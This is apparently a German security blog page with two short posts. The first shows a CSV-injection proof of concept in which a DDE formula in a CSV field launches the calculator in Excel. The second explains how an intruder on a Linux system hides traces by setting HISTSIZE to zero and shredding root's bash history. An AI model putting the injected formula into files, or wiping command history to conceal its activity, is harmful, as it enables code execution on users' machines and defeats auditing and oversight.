Excel CSV Injection

2017-11-01 von Mario

Vor einiger Zeit wurde eine interessante Möglichkeit identifiziert, um mittels einer CSV Datei eine Ausführung eines beliebigen Programms mit MS Excel zu bewerkstelligen. Als Basis dafür kann eine beliebige CSV Datei verwendet werden:

UserId,Datum,ProjektName,Beschreibung,Dauer
1,2017-11-01,Test Projekt,Das ist ein Test,180
2,2017-08-17,Hausbau,"Haus1, Haus2, Haus3", 240
3,2017-07-25,Wichtiger Kunde,"=2+2+cmd|' /C calc'!A0", 240

In der Zeile drei und in der Spalte Beschreibung wird eine Formel verwendet:

"=2+2+cmd|' /C calc'!A0"

Schritt 1

Als erstes die Datei mit MS Excel öffnen.

Schritt 2

Danach die entsprechenden Zeilen markieren.

Schritt 3

Daraufhin auf den Reiter “DATEN” wechseln und Button “Text in Spalten” klicken.

Jetzt dem Wizard mit “Weiter” folgen.

Die Option “Komma” wählen und “Fertig stellen” klicken.

Es erfolgt ein Sicherheitshinweis durch Excel.

Schritt 4

Und siehe da, der Taschenrechner wird gestartet.

 

Quelle

http://georgemauer.net/2017/10/07/csv-injection.html

Kategorie: IT-Security Schlagwörter: , , ,

Linux Log Files – Spuren nach einem Hack verwischen

2017-02-08 von Mario

Wenn ein Linux-System gehackt wird, entstehen zahlreiche Spuren in Log-Files. Im folgenden wird erläutert, wie als Angreifer Spuren auf einem kompromittiertem System vermieden werden können.

 

Histsize

Nachdem es gelungen ist, eine Shell zu erlangen, werden normalerweise alle eingegeben Befehle im jeweiligen Homeverzeichnis in der Historie der Bash gespeichert.

~/.bash_history

Eine Möglichkeit, die Spuren zu verwischen, ist die manuelle Löschung der eingegebenen Befehle. Eine elegantere Methode ist, die Umgebungsvariable “Histsize” zu begrenzen. Mit dem Befehl “echo” kann angezeigt werden, wie viele der letzten eingegebenen Befehle in der Historie (bash_history) gespeichert werden.

echo $HISTSIZE

Setzt man den Wert mit dem Kommando “export” auf Null, so speichert die Shell keine Eingaben in die Historie.

export HISTSIZE=0

Falls schon mehrere Befehle eingeben wurden, dann einfach Ab- und Anmelden, um den Verlauf zu löschen, nachdem die HISTSIZE auf Null gesetzt wurde.

Shred

Falls die Zeit knapp sein sollte, kann der Befehl “shred” verwendet werden, um die History-Datei zu löschen. Mit diesem Kommando können Dateien überschrieben werden.

shred -zu root/.bash_history

Der Parameter “z” überschreibt die Datei mit Nullen und der Parameter “u” löscht die Datei, nachdem diese überschrieben ist.

Kategorie: IT-Security Schlagwörter: , , , , ,